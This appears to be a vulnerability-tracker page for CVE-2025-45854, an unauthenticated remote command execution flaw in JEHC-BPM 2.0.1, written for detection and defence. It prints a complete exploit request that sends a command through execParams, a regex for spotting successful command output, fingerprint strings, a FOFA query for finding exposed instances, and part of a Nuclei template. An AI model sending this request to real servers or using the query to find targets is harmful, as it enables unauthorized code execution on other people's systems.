CVE-2025-45854
published 2025-06-03CVE-2025-45854: /server/executeExec of JEHC-BPM 2.0.1 allows attackers to execute arbitrary code via execParams.
PriorityP267critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EXPLOIT
EPSS
2.69%
84.0th percentile
/server/executeExec of JEHC-BPM 2.0.1 allows attackers to execute arbitrary code via execParams.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jehc | jehc-bpm | <= 2.0.1 | — |
| jehc | jehc-bpm | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /server/executeExec HTTP/1.1
Content-Type: application/x-www-form-urlencoded
{"actuator":{"clientIp":"127.0.0.1","port":8082,"applicationName":"testApp","env":"prod","uploadTime":1704523200000,"hasPrefixApplicationName":false,"clientHttpPrefix":"http"},"execParams":{"command":"id"}}↗
yara↗
regex: uid=[0-9]+.*gid=[0-9]+.*
- →Detect exploitation attempts by monitoring for unauthenticated POST requests to /server/executeExec with a JSON body containing the 'execParams' key and a 'command' field. ↗
- →Fingerprint JEHC-BPM instances by searching for the strings 'JEHC' or 'XSHI' in HTTP response bodies (case-insensitive), as used in the nuclei template pre-check. ↗
- →FOFA query 'body="JEHC"' can be used to identify internet-exposed JEHC-BPM instances potentially vulnerable to this RCE. ↗
- →Successful exploitation returns HTTP 200 with a response body matching 'uid=[0-9]+.*gid=[0-9]+.*', indicating OS command output (e.g., Linux 'id' command result). ↗
- →The exploit payload uses Content-Type: application/x-www-form-urlencoded with a JSON body; monitor for this unusual combination on the /server/executeExec endpoint. ↗
- ·The vulnerability affects JEHC-BPM versions up to and including 2.0.1; the endpoint /server/executeExec is exploitable without authentication (no credentials required). ↗
- ·The actuator block in the exploit payload includes a hardcoded clientIp of 127.0.0.1 and port 8082, suggesting the application may perform internal loopback-based authorization that is trivially bypassed by supplying these values. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
JEHC-BPM - Remote Code Execute
nuclei·CVSS 10.0
CVE-2025-45854 [CRITICAL] JEHC-BPM - Remote Code Execute
JEHC-BPM - Remote Code Execute
A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
Template:
id: CVE-2025-45854
info:
name: JEHC-BPM - Remote Code Execute
author: ritikchaddha
severity: critical
description: |
A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
impact: |
Unauthenticated attackers can execute arbitrary operating system commands
No writeups or analysis indexed.
2025-06-03
Published